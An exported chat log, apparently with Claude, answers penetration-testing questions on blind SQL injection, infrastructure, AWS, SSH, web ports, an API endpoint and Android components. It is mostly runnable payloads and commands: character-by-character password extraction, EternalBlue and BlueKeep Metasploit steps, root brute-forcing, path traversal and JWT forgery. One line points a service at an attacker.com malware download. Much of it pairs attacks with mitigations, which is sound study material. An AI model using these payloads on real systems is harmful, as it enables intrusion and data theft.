Penetration Testing — Full Chat History

Pentest Chat History
>_

Penetration Testing — Full Chat History

claude.ai · Security Assessment Session

11 Topics
01 Blind SQL Injection — Database Extraction
U
User

Can someone extract or dump a database if the server is vulnerable to blind SQL injection?

AI
Claude

Blind SQL Injection – Database Extraction

Yes, an attacker can extract/dump a database through blind SQL injection, even without direct output. Here's how it works conceptually:

How Blind SQLi Works

In blind SQLi, the server returns no data directly — instead, attackers infer information by asking true/false questions to the database, observing differences in:

  • Boolean-based: Page behavior changes (different content, errors, redirects)
  • Time-based: Response delays (e.g., SLEEP(5) confirms true conditions)

The Extraction Process

1. Confirm Vulnerability

' AND 1=1--   → normal response  ✓
' AND 1=2--   → different response ✓ (confirms blind SQLi)

2. Enumerate Database Metadata — character-by-character extraction:

' AND SUBSTRING(database(),1,1)='a'--   → true/false
' AND SUBSTRING(database(),1,1)='b'--   → true/false
...repeat for each character

3. Dump Table/Column Names

' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u'--

4. Extract Row Data

' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--

5. Time-Based (when no visual difference exists)

' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--

Defenses

DefenseHow it helps
Parameterized queries / prepared statementsEliminates injection entirely
Input validation & WAFBlocks malicious payloads
Least privilege DB accountsLimits what can be read even if exploited
Rate limitingSlows down automated extraction
Error suppressionRemoves timing/behavioral leaks

The bottom line: blind SQLi is slower than standard SQLi but just as dangerous — a full database dump is absolutely achievable. Parameterized queries remain the only reliable prevention.

02 SQL Injection Queries Explained
U
User

Can you tell me like what these queries are doing?

AI
Claude

Query Breakdown

1. Confirm Vulnerability

' AND 1=1--
' AND 1=2--
  • The ' closes the original string in the SQL query
  • AND 1=1 is always true → page loads normally
  • AND 1=2 is always false → page behaves differently
  • -- comments out the rest of the original query

2. Extract Database Name

' AND SUBSTRING(database(),1,1)='a'--
  • database() → returns the current database name
  • SUBSTRING(database(), 1, 1) → extracts 1 character starting at position 1
  • = 'a' → asks "is the first character 'a'?"
  • Repeat for position 2, 3, 4... until full name is known

3. Extract Table Names

' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u'--
  • information_schema.tables → a built-in MySQL table that lists all tables
  • SELECT table_name ... LIMIT 1 → picks the first table name
  • SUBSTRING(..., 1, 1) = 'u' → asks "does the first table name start with 'u'?"

4. Extract Actual Data

' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
  • SELECT password FROM users LIMIT 1 → grabs the first password
  • Repeat for each character position to reconstruct the full password

5. Time-Based

' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--
  • IF(condition, true_action, false_action) → standard if/else
  • If the first character is 'a' → SLEEP(5) (server pauses 5 seconds)
  • Attacker measures response time to determine true/false

Summary

QueryWhat it extracts
1=1 vs 1=2Confirms injection exists
SUBSTRING(database(),...)Database name
information_schema.tablesTable names
SELECT password FROM usersActual sensitive data
IF(..., SLEEP(5), 0)Same as above but via timing
03 SUBSTRING Function — What is it Extracting?
U
User

What is it extracting? (shared excerpt: "SUBSTRING(database(), 1, 1) → extracts 1 character starting at position 1 (first character)")

AI
Claude

Breaking It Down

SUBSTRING(database(), 1, 1)
PartMeaning
database()Returns the name of the current database (e.g., "shopdb")
First 1Start position — start from character number 1 (the beginning)
Second 1Length — extract only 1 character

Example

If the database name is "shopdb":

SUBSTRING("shopdb", 1, 1) → "s"
SUBSTRING("shopdb", 2, 1) → "h"
SUBSTRING("shopdb", 3, 1) → "o"
SUBSTRING("shopdb", 4, 1) → "p"

In blind SQL injection, the attacker pulls out the database name one character at a time by asking yes/no questions like "is this character equal to 's'?"

04 Extract One User from Database — Step by Step
U
User

Suppose that you have found there is a parameter "user" that is vulnerable. How would you perform this — extract only one user from the database, step by step?

AI
Claude

Scenario

You found that the user parameter is vulnerable:

https://example.com/profile?user=john

Step 1: Confirm the Injection

?user=john' AND 1=1--    → normal page ✓
?user=john' AND 1=2--    → different/broken page ✓

Confirmed vulnerable.

Step 2: Find the Database Name Length

?user=john' AND LENGTH(database())=6--

Try 1, 2, 3... until you get a true response.

Step 3: Extract Database Name Character by Character

?user=john' AND SUBSTRING(database(),1,1)='s'--   → true
?user=john' AND SUBSTRING(database(),2,1)='h'--   → true
?user=john' AND SUBSTRING(database(),3,1)='o'--   → true
?user=john' AND SUBSTRING(database(),4,1)='p'--   → true
?user=john' AND SUBSTRING(database(),5,1)='d'--   → true
?user=john' AND SUBSTRING(database(),6,1)='b'--   → true

✅ Database name = shopdb

Step 4: Find the Table Name

?user=john' AND SUBSTRING((SELECT table_name FROM information_schema.tables 
WHERE table_schema='shopdb' LIMIT 1),1,1)='u'--

✅ Table name = users

Step 5: Find Column Names

?user=john' AND SUBSTRING((SELECT column_name FROM information_schema.columns 
WHERE table_name='users' LIMIT 1),1,1)='i'--

✅ Columns found = id, username, password, email

Step 6: Extract One User's Data

Extract username:

?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),2,1)='d'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),3,1)='m'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),4,1)='i'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),5,1)='n'--

✅ Username = admin

Extract password:

?user=john' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
?user=john' AND SUBSTRING((SELECT password FROM users LIMIT 1),2,1)='f'--
... and so on

Key Points

  • Every LIMIT 1 ensures you're only targeting one row
  • Use LIMIT 1 OFFSET 1 for the second user, OFFSET 2 for third
  • -- at the end comments out remaining SQL to prevent errors
  • Manually doing this takes hundreds of requests — tools like sqlmap automate this entirely
05 Infrastructure Pentesting
U
User

You are doing pentesting and you got infrastructure. How would you do infrastructure pentesting?

AI
Claude

Infrastructure Pentesting Methodology

Phase 1: Reconnaissance

Passive Recon:

- WHOIS lookup → domain ownership, registrar info
- DNS enumeration → subdomains, MX records, NS records
- Google dorking → exposed files, login pages
- Shodan/Censys → open ports, banners, exposed services
- LinkedIn/job postings → tech stack hints

Active Recon:

- Ping sweeps → find live hosts
- DNS zone transfer attempts
- Banner grabbing → identify software versions

Phase 2: Scanning & Enumeration

# Discover live hosts
nmap -sn 192.168.1.0/24

# Full port scan
nmap -sV -sC -p- 192.168.1.10

# OS detection
nmap -O 192.168.1.10
Port/ServiceWhat to Enumerate
21 (FTP)Anonymous login, version
22 (SSH)Version, weak credentials
25 (SMTP)Open relay, user enumeration
80/443 (HTTP/S)Web tech, directories
445 (SMB)Shares, null sessions
3306 (MySQL)Remote access, default creds
3389 (RDP)Version, brute force

Phase 3: Vulnerability Assessment

# Nikto web server scan
nikto -h http://192.168.1.10

# SMB vulnerabilities
nmap --script smb-vuln* 192.168.1.10

# Check CVEs
searchsploit apache 2.4.49

Phase 4: Exploitation

1. Unpatched services    → known CVE exploits (Metasploit)
2. Weak credentials      → brute force SSH, RDP, FTP
3. Misconfigured SMB     → null sessions, exposed shares
4. Default credentials   → routers, printers, admin panels
5. SSL/TLS issues        → POODLE, Heartbleed, BEAST
6. Open ports            → exposed internal services
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
run

Phase 5: Post-Exploitation

- Privilege escalation    → get root/SYSTEM access
- Credential dumping      → extract hashes (mimikatz)
- Lateral movement        → pivot to other machines
- Persistence check       → could attacker maintain access?
- Data access audit       → what sensitive data is reachable?
- Network sniffing        → intercept internal traffic

Phase 6: Lateral Movement

Initial Access
      ↓
Dump credentials / find SSH keys
      ↓
Use credentials on other machines
      ↓
Reach domain controller / core servers
      ↓
Full network compromise

Phase 7: Reporting

1. Executive Summary     → high-level risk overview
2. Scope & Methodology  → what was tested, how
3. Findings              → each vuln with description,
                           risk rating, evidence, remediation
4. Attack Chain          → how far you got step by step
5. Recommendations       → prioritized fixes

Key Rules

  • Always stay within agreed scope
  • Get written authorization before starting
  • Document everything as you go
  • Never cause unnecessary disruption to live systems
  • Follow responsible disclosure for critical findings
06 AWS Security Assessment
U
User

If you got AWS creds how would you do security assessment? Step by step?

AI
Claude

AWS Security Assessment

Pre-requisites

# Install AWS CLI
pip install awscli

# Configure credentials
aws configure
# Enter: Access Key ID, Secret Access Key, Region

Phase 1: Identify Who You Are

# Who am I?
aws sts get-caller-identity
# Returns: Account ID, User ARN, User ID

Phase 2: Enumerate IAM Permissions

aws iam list-users
aws iam list-groups
aws iam list-attached-user-policies --user-name <username>
aws iam list-roles
aws iam list-user-policies --user-name <username>

# Tool: enumerate-iam
python enumerate-iam.py --access-key <key> --secret-key <secret>

Phase 3: S3 Bucket Assessment

aws s3 ls
aws s3 ls s3://bucket-name
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
aws s3api get-public-access-block --bucket bucket-name
aws s3api get-bucket-encryption --bucket bucket-name
aws s3api get-bucket-versioning --bucket bucket-name

Phase 4: EC2 Assessment

aws ec2 describe-instances
aws ec2 describe-security-groups
# Look for 0.0.0.0/0 rules
aws ec2 describe-security-groups \
  --query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]]'
aws ec2 describe-snapshots --owner-ids self

Phase 5: IAM Deep Dive

aws iam get-account-password-policy
aws iam list-virtual-mfa-devices
aws iam list-access-keys --user-name <username>
aws iam list-entities-for-policy \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Phase 6: Network Assessment (VPC)

aws ec2 describe-vpcs
aws ec2 describe-subnets
aws ec2 describe-network-acls
aws ec2 describe-flow-logs
aws ec2 describe-internet-gateways

Phase 7: Logging & Monitoring

aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name <trail-name>
aws cloudwatch describe-alarms
aws guardduty list-detectors

Phase 8: Other Services

aws lambda list-functions
aws rds describe-db-instances
aws secretsmanager list-secrets
aws ssm describe-parameters
aws sqs list-queues

Phase 9: Privilege Escalation Checks

Common escalation paths:
- iam:CreatePolicyVersion         → replace policy with admin policy
- iam:AttachUserPolicy            → attach admin policy to self
- iam:PassRole + ec2:RunInstances → launch EC2 with admin role
- lambda:CreateFunction           → run code as admin role
- sts:AssumeRole                  → assume more privileged role

# Tool: Pacu (AWS exploitation framework)
python3 pacu.py

Common Critical Findings

FindingRisk
Public S3 buckets with sensitive dataCritical
No MFA on root/admin accountsCritical
CloudTrail disabledHigh
SSH open to 0.0.0.0/0High
Old unused access keysHigh
No GuardDutyMedium
Unencrypted RDS/EBSMedium
Overly permissive IAM rolesHigh
07 AWS Open SSH Port — 0.0.0.0/0 TCP 22
U
User

If you got AWS this 0.0.0.0/0 TCP 22 — what are tests you perform and how do you mitigate?

AI
Claude

What Does 0.0.0.0/0 TCP 22 Mean?

0.0.0.0/0  = ANY IP address in the world
TCP 22     = SSH port
Translation: Anyone on the internet can attempt to connect via SSH

Tests to Perform

1. Verify the Finding

aws ec2 describe-security-groups \
  --query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`] && ToPort==`22`]]'

2. Check SSH is Running

nmap -sV -p 22 <public-ip>

3. Check CVEs

searchsploit openssh <version>
nmap --script ssh-vuln* -p 22 <ip>
nmap --script ssh2-enum-algos -p 22 <ip>
CVEDescriptionRisk
CVE-2023-38408Remote code executionCritical
CVE-2016-6210User enumerationMedium
CVE-2018-15473User enumerationMedium
CVE-2019-6111SCP path traversalMedium

4. Auth Method Check

nmap --script ssh-auth-methods -p 22 <ip>
# Bad findings:
# - Password authentication enabled
# - Root login permitted

5. Brute Force

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<ip> -t 4
medusa -h <ip> -u root -P rockyou.txt -M ssh

6. Check SSH Config (if access gained)

cat /etc/ssh/sshd_config
# Bad settings:
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
Protocol 1

Mitigation Steps

1. Restrict Security Group

# Remove the 0.0.0.0/0 rule
aws ec2 revoke-security-group-ingress \
  --group-id sg-xxxxxxxx --protocol tcp --port 22 --cidr 0.0.0.0/0

# Allow only YOUR IP
aws ec2 authorize-security-group-ingress \
  --group-id sg-xxxxxxxx --protocol tcp --port 22 --cidr <your-ip>/32

2. Disable Password Auth

PasswordAuthentication no
PermitRootLogin no
PermitEmptyPasswords no
MaxAuthTries 3
Protocol 2

3. Use SSM Instead of SSH

aws ssm start-session --target <instance-id>

4. Enable Fail2Ban

[sshd]
enabled  = true
maxretry = 3
bantime  = 3600

5. Use Strong Keys

ssh-keygen -t ed25519 -C "your@email.com"
# or RSA 4096
ssh-keygen -t rsa -b 4096

Risk Rating

IssueRisk
SSH open to 0.0.0.0/0🔴 Critical
Password auth enabled🔴 Critical
Root login permitted🔴 Critical
Old OpenSSH version🟠 High
No fail2ban🟠 High
No CloudWatch alerts🟡 Medium
08 Network Pentest — TCP 22, 80, 443, 3389
U
User

During network pentesting, nmap scan shows TCP22, TCP80, TCP443, TCP3389. What do you do? What are the test cases you will test?

AI
Claude

TCP 22 — SSH

nmap -sV -p 22 <ip>
nmap --script ssh-auth-methods -p 22 <ip>
nmap --script ssh2-enum-algos -p 22 <ip>
hydra -L users.txt -P passwords.txt ssh://<ip>
searchsploit openssh <version>

Look for: Password auth enabled, root login, old version, weak algorithms, user enumeration


TCP 80 — HTTP

1. Fingerprint

nmap -sV -p 80 <ip>
curl -I http://<ip>
whatweb http://<ip>

2. Directory Enumeration

gobuster dir -u http://<ip> -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://<ip>
# Check: /admin /login /backup /config /.git /api /phpinfo.php

3. Vulnerability Scan

nikto -h http://<ip>
nmap --script http-vuln* -p 80 <ip>

4. CMS Scanning

wpscan --url http://<ip> --enumerate u,p,t   # WordPress
joomscan -u http://<ip>                       # Joomla
droopescan scan drupal -u http://<ip>         # Drupal

5. HTTP Methods

nmap --script http-methods -p 80 <ip>
curl -X OPTIONS http://<ip> -v

TCP 443 — HTTPS

All HTTP tests PLUS:

SSL/TLS Assessment

sslscan <ip>:443
testssl.sh <ip>
nmap --script ssl-enum-ciphers -p 443 <ip>
nmap --script ssl-heartbleed -p 443 <ip>
nmap --script ssl-poodle -p 443 <ip>

Certificate Analysis

openssl s_client -connect <ip>:443
# Check: expiry, self-signed, SHA1 vs SHA256, domain mismatch

Bad Protocols: SSLv2, SSLv3, TLS 1.0, TLS 1.1

Good Protocols: TLS 1.2 ✓, TLS 1.3 ✓

Security Headers to Check:

Strict-Transport-Security (HSTS)
Content-Security-Policy (CSP)
X-Frame-Options
X-Content-Type-Options

TCP 3389 — RDP

1. BlueKeep Check (Critical)

nmap --script rdp-vuln-ms12-020 -p 3389 <ip>

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <ip>
run

2. Encryption & NLA Check

nmap --script rdp-enum-encryption -p 3389 <ip>
# If NLA not enforced → anyone can reach login screen

3. Brute Force

hydra -L users.txt -P passwords.txt rdp://<ip>
crowbar -b rdp -s <ip>/32 -u administrator -C passwords.txt

Complete Test Summary

PortServiceKey TestsCritical Findings
22SSHBrute force, CVEs, auth methodsPassword auth on, root login
80HTTPNikto, gobuster, SQLi, CMSAdmin exposed, SQLi, default creds
443HTTPSSSL scan, cert check, HTTP testsHeartbleed, weak TLS, no HSTS
3389RDPBlueKeep, brute force, NLABlueKeep vuln, no NLA

Tools Summary

nmap · nikto · gobuster · wpscan · sslscan · testssl.sh · hydra · metasploit · searchsploit
09 API Endpoint Security Testing — /api/user/1001
U
User

What are test cases you perform on this endpoint /api/user/1001?

AI
Claude

What This Endpoint Tells Us

/api/user/1001
       ↑
  numeric ID → likely sequential → IDOR risk immediately

1. IDOR — Most Critical

GET /api/user/1000   # try other users
GET /api/user/1002
GET /api/user/1
GET /api/user/0
GET /api/user/-1
GET /api/user/99999999

2. HTTP Method Testing

GET    /api/user/1001  → read
POST   /api/user/1001  → create?
PUT    /api/user/1001  → update
PATCH  /api/user/1001  → partial update
DELETE /api/user/1001  → can you delete?
OPTIONS /api/user/1001 → what methods allowed?

3. Authentication Testing

# No token
GET /api/user/1001   (no Authorization header)

# Empty / invalid token
Authorization: Bearer
Authorization: Bearer invalidtoken123

# Expired token
Authorization: Bearer <old-expired-token>

4. Authorization / Privilege Escalation

# User B token accessing User A data
GET /api/user/1001
Authorization: Bearer <user_B_token>

# Role bypass via parameters
GET /api/user/1001?role=admin
GET /api/user/1001?admin=true
GET /api/user/1001?debug=true

5. SQL Injection

GET /api/user/1001'
GET /api/user/1001--
GET /api/user/1001 AND 1=1
GET /api/user/1001; SLEEP(5)--
GET /api/user/1001 UNION SELECT null,null,null--
GET /api/user/1001%27

6. Input Validation & Fuzzing

GET /api/user/abc
GET /api/user/null
GET /api/user/NaN
GET /api/user/<script>alert(1)</script>
GET /api/user/../../etc/passwd
GET /api/user/1001%00
GET /api/user/[1001]

7. Mass Assignment

PUT /api/user/1001
{
  "username": "hacker",
  "role": "admin",       ← privilege escalation
  "isAdmin": true,
  "balance": 99999
}

8. Information Disclosure

# Check response for sensitive fields:
"password": "..."       ← should NOT appear
"api_key": "sk-..."    ← secret leak
"ssn": "..."           ← PII
"credit_card": "..."   ← critical

# Debug modes
GET /api/user/1001?debug=true
GET /api/user/1001?verbose=true
GET /api/user/1001.xml

9. Rate Limiting

ffuf -u http://target.com/api/user/FUZZ \
  -w numbers.txt -mc 200
# No rate limit → can enumerate all users

10. JWT Testing

# Change alg to "none"
{"alg": "none", "typ": "JWT"}

# Modify payload
{"user_id": 1001, "role": "admin"}

# Tool
jwt_tool -t <token> -M at

11. Security Headers

curl -I http://target.com/api/user/1001
# Should be present:
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000
# Should NOT expose:
X-Powered-By: PHP/7.2
Server: Apache/2.4.1

Complete Test Summary

TestToolRisk if Vulnerable
IDORBurp, curlCritical
Auth bypasscurlCritical
SQLisqlmap, manualCritical
Privilege escalationBurpCritical
Mass assignmentBurpHigh
JWT attacksjwt_toolHigh
Rate limitingffuf, BurpHigh
Info disclosurecurlHigh
Input fuzzingffufMedium
Security headerscurlMedium
10 Android Security Assessment
U
User

How do you do Android security assessment on the main Android components: Activities, Services, Broadcast Receivers, Content Provider?

AI
Claude

Setup

# Tools needed
adb · apktool · jadx · frida · drozer · mobsf · burpsuite

# Connect device and pull APK
adb devices
adb shell pm list packages | grep target
adb pull /data/app/com.target.app/base.apk

Static Analysis First

apktool d target.apk -o output_folder
jadx -d output_folder target.apk
# Upload to MobSF for automated scan

# Key manifest flags to check:
android:debuggable="true"           ← debug in prod
android:allowBackup="true"          ← data extractable
android:exported="true"             ← component exposed
android:usesCleartextTraffic="true" ← HTTP allowed

1. Activities

Activity = Screen/UI of the app (Login, Dashboard, Settings)

Static Analysis

cat AndroidManifest.xml | grep -A5 "activity"
# Look for android:exported="true"

Launch Exported Activities (Bypass Login)

adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DashboardActivity
adb shell am start -n com.target.app/.ProfileActivity \
  --es "user_id" "admin" --ez "isAdmin" true

# Drozer
dz> run app.activity.info -a com.target.app
dz> run app.activity.start --component com.target.app .AdminActivity

Intent Injection

adb shell am start -n com.target.app/.WebViewActivity \
  -d "file:///etc/passwd"
adb shell am start -n com.target.app/.WebViewActivity \
  --es "url" "javascript:alert(1)"

What to look for: Exported activities accessible without auth, login bypass, sensitive Intent extras, WebView with arbitrary URLs, task hijacking


2. Services

Service = Background process (music player, sync, upload)

Start/Stop Exported Services

adb shell am startservice -n com.target.app/.BackgroundService
adb shell am stopservice -n com.target.app/.BackgroundService

dz> run app.service.info -a com.target.app
dz> run app.service.start --component com.target.app .SyncService

Malicious Intent to Service

adb shell am startservice -n com.target.app/.DownloadService \
  --es "url" "http://attacker.com/malware.apk" \
  --es "filename" "../../data/data/com.target.app/evil"

Frida Hook

Java.perform(function() {
  var SyncService = Java.use('com.target.app.SyncService')
  SyncService.onStartCommand.implementation = function(intent, flags, startId) {
    console.log('Service started with: ' + intent)
    return this.onStartCommand(intent, flags, startId)
  }
})

3. Broadcast Receivers

Receiver = Listens for events (BOOT_COMPLETED, SMS_RECEIVED, custom broadcasts)

Send Malicious Broadcasts

adb shell am broadcast -a com.target.app.RESET_PASSWORD \
  -n com.target.app/.PasswordResetReceiver

adb shell am broadcast -a com.target.app.UPDATE_USER \
  --es "role" "admin" --es "user_id" "1001"

# Fake payment confirmation
adb shell am broadcast -a com.target.app.PAYMENT_SUCCESS \
  --es "order_id" "12345"

Sniff Broadcasts

dz> run app.broadcast.sniff --action com.target.app.USER_LOGGED_IN
# May leak: auth tokens, credentials, session IDs

What to look for: Sensitive actions triggered by any app, tokens leaked in broadcasts, payment manipulation, password reset without auth


4. Content Providers

Provider = Shared data store (Contacts, Media, custom DB)

Query Provider (Read Data)

adb shell content query --uri content://com.target.app.provider/users
adb shell content query --uri content://com.target.app.provider/users/1

dz> run app.provider.info -a com.target.app
dz> run app.provider.query content://com.target.app.provider/users

SQL Injection via Provider

# Projection SQLi
dz> run app.provider.query content://com.target.app.provider/users \
  --projection "* FROM sqlite_master--"

# Selection SQLi
dz> run app.provider.query content://com.target.app.provider/users \
  --selection "1=1"

# Automated scan
dz> run scanner.provider.injection -a com.target.app
dz> run scanner.provider.sqltables -a com.target.app

Insert / Update / Delete

adb shell content insert \
  --uri content://com.target.app.provider/users \
  --bind name:s:hacker --bind role:s:admin

adb shell content update \
  --uri content://com.target.app.provider/users/1 \
  --bind role:s:admin

Path Traversal

dz> run app.provider.read \
  content://com.target.app.provider/../../../../data/data/com.target.app/databases/userdb.db

content://com.target.app.fileprovider/../shared_prefs/credentials.xml
content://com.target.app.fileprovider/../databases/app.db

Automated Scan

dz> run scanner.provider.finduris -a com.target.app
dz> run scanner.provider.injection -a com.target.app
dz> run scanner.provider.traversal -a com.target.app

Additional Checks

Data Storage

adb shell cat /data/data/com.target.app/shared_prefs/*.xml
adb shell sqlite3 /data/data/com.target.app/databases/app.db ".tables"
adb logcat | grep com.target.app

SSL Pinning Bypass

frida -U -f com.target.app -l ssl_pinning_bypass.js --no-pause

Complete Summary

ComponentKey AttackRisk
ActivityDirect launch, bypass loginCritical
ServiceTrigger sensitive background opsHigh
BroadcastFake broadcasts, data interceptHigh
Content ProviderSQLi, read full databaseCritical
Data StorageRead credentials, tokensCritical
NetworkMITM, intercept trafficHigh

Tools

MobSF · apktool · jadx · drozer · frida · adb · burpsuite · objection
11 All Questions Summary
U
User

Now give me all the questions I have asked you.

AI
Claude

All Questions Asked — Summary

#QuestionTopic
01Can someone extract or dump a DB if the server is vulnerable to blind SQL injection?SQL Injection
02Can you tell me like what these queries are doing?SQL Injection
03What is it extracting? (SUBSTRING excerpt)SQL Injection
04Suppose the "user" parameter is vulnerable — extract only one user, step by stepSQL Injection
05You are doing pentesting and got infrastructure — how would you do infrastructure pentesting?Infrastructure
06If you got AWS creds how would you do security assessment? Step by step?AWS
07If you got AWS 0.0.0.0/0 TCP 22 — what tests do you perform and how do you mitigate?AWS / SSH
08During network pentesting nmap shows TCP22, TCP80, TCP443, TCP3389 — what do you do?Network Pentest
09What are test cases you perform on endpoint /api/user/1001?API Security
10How do you do Android security assessment on Activities, Services, Broadcast Receivers, Content Provider?Android
11Now give me all the questions I have asked you.Summary

Total: 11 questions covering SQL Injection, Infrastructure Pentesting, AWS Security, Network Pentesting, API Security, and Android Security Assessment.

Comments